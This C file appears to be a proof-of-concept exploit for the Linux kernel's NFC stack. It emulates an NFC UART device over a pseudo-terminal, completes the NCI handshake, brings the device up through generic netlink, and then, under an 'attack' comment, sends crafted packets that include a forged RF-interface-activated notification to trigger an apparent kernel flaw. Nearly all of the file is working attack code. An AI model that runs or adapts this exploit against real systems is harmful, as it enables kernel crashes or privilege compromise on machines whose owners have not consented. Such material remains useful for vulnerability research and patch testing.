#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/genetlink.h>
#include <stdbool.h>

#include "ptty_device.h"
#include "nfc.h"
#include "netlink.h"

int master;
int slave;
static struct nlmsg nlmsg;

struct nci_rf_intf_activated_ntf {
	__u8	rf_discovery_id;
	__u8	rf_interface;
	__u8	rf_protocol;
	__u8	activation_rf_tech_and_mode;
	__u8	max_data_pkt_payload_size;
	__u8	initial_num_credits;
	__u8	rf_tech_specific_params_len;
	__u8	data_exch_rf_tech_and_mode;
	__u8	data_exch_tx_bit_rate;
	__u8	data_exch_rx_bit_rate;
	__u8	activation_params_len;
} __attribute__((packed));

struct nci_rf_intf_activated_ntf fake = {
	.rf_discovery_id = 0x0,
	.rf_interface = 0x1,
	.rf_protocol = 0x0,
	.activation_rf_tech_and_mode = 0x0,
	.max_data_pkt_payload_size = 0x0,
	.initial_num_credits = 0x1,
	.rf_tech_specific_params_len = 0x0,
	.data_exch_rf_tech_and_mode = 0x0,
	.data_exch_tx_bit_rate = 0x0,
	.data_exch_rx_bit_rate = 0x0,
	.activation_params_len = 0x0,
};


void* device_thread(void* arg) {
	const __u8 nci_reset_cmd[] = {0x20, 0x00, 0x01, 0x01};
	const __u8 nci_init_cmd[] = {0x20, 0x01, 0x00};
	const __u8 nci_set_config_cmd[] = {0x20, 0x02, 0x04, 0x01, 0x11, 0x01, 0x01};
	const __u8 nci_reset_rsp[] = {0x40, 0x00, 0x03, 0x00, 0x10, 0x01};
	const __u8 nci_init_rsp[] = {0x40, 0x01, 0x14, 0x00, 0x02, 0x0e, 0x02,
                             0x00, 0x03, 0x01, 0x02, 0x03, 0x02, 0xc8,
                             0x00, 0xff, 0x10, 0x00, 0x0e, 0x12, 0x00,
                             0x00, 0x04};
	const __u8 nci_set_config_rsp[] = {0x40, 0x02, 0x04, 0x00, 0x11, 0x01, 0x01};
	const __u8 nci_rf_disc_map_cmd[] = {0x21, 0x00, 0x07, 0x02, 0x04, 0x03,
                                    0x02, 0x05, 0x03, 0x03};
	const __u8 nci_rf_disc_map_rsp[] = {0x41, 0x00, 0x01, 0x00};
    	int nci_fd = *(int*)arg;
    	char buf[258];
	int len;

        while ((len = read(nci_fd, buf, 258)) == 0)
                ;
        if (len <= 0)
                goto error;
        if (len != sizeof(nci_reset_cmd))
                goto error;
        if (memcmp(nci_reset_cmd, buf, len))
                goto error;
        write(nci_fd, nci_reset_rsp, sizeof(nci_reset_rsp));
	printf("[+] nci_reset_rsp sent\n");

        while ((len = read(nci_fd, buf, 258)) == 0)
                ;
        if (len <= 0)
                goto error;
        if (len != sizeof(nci_set_config_cmd))
                goto error;
        if (memcmp(nci_set_config_cmd, buf, len))
                goto error;
	write(nci_fd, nci_set_config_rsp, sizeof(nci_set_config_rsp));
	printf("[+] nci_set_config_rsp sent\n");

        while ((len = read(nci_fd, buf, 258)) == 0)
                ;
        if (len <= 0)
                goto error;
        if (len != sizeof(nci_init_cmd))
                goto error;
        if (memcmp(nci_init_cmd, buf, len))
                goto error;
	write(nci_fd, nci_init_rsp, sizeof(nci_init_rsp));
	printf("[+] nci_init_rsp sent\n");

	while ((len = read(nci_fd, buf, 258)) == 0)
                ;
	if (len <= 0)
                goto error;
        if (len != sizeof(nci_rf_disc_map_cmd))
                goto error;
        if (memcmp(nci_rf_disc_map_cmd, buf, len))
                goto error;
	write(nci_fd, nci_rf_disc_map_rsp, sizeof(nci_rf_disc_map_rsp));
	printf("[+] nci_rf_disc_map_rsp sent\n");

	return (void*)0;
error:
	printf("[!] bad command matching\n");
	for(int i = 0; i < len; i++)
		printf("%02x ", buf[i] & 0xff);
	puts("");
	return (void*)-1;
}

int main(int argc, char* argv[])
{
   	int err;
    	master = getmaster();
    	slave = getslave(master);
    	if (nfc_register(slave) < 0) {
        	printf("[!] failed to register NFC uart\n");
        	exit(1);
    	}

    	pthread_t th;
    	pthread_create(&th, NULL, device_thread, &master);

	int nsock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
    	if (nsock < 0) {
        	perror("[!] netlink socket()");
        	exit(1);
    	}

    	int nfc_family_id = netlink_query_family_id(&nlmsg, nsock, "nfc", true);
		struct genlmsghdr genlhdr = {0};
	genlhdr.cmd = NFC_CMD_DEV_UP;
	uint32_t idx = 0x2; // interesting
	netlink_init(&nlmsg, nfc_family_id, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, NFC_ATTR_DEVICE_INDEX, &idx, sizeof(uint32_t));
	err = netlink_send(&nlmsg, nsock);
	if (err < 0) {
	    	perror("[!] netlink device setup\n");
	    	exit(1);
	}

	// check setup
	int status;
	pthread_join(th, (void**)&status);
	if (status != 0) {
		perror("[!] bad device setup\n");
		exit(1);
	}

	// attack
	const __u8 pkt1[256] = {0x41, 0x03, 0x01, 0x00};
	const __u8 pkt2[256] = {0x50, 0x05, 0x01, 0x00};
	const __u8 pkt3[256] = {0x71, 0x05, sizeof(fake)};
	memcpy(pkt3 + 3, &fake, sizeof(fake));

	printf("== pkt1 ==\n");
	write(master, pkt1, 0x4);
	sleep(1);
	
	printf("== pkt2 ==\n");
	write(master, pkt2, 0x4);
	sleep(1);
	printf("== pkt3 ==\n");
	write(master, pkt3, sizeof(fake) + 0xf);
	
	return 0;
}


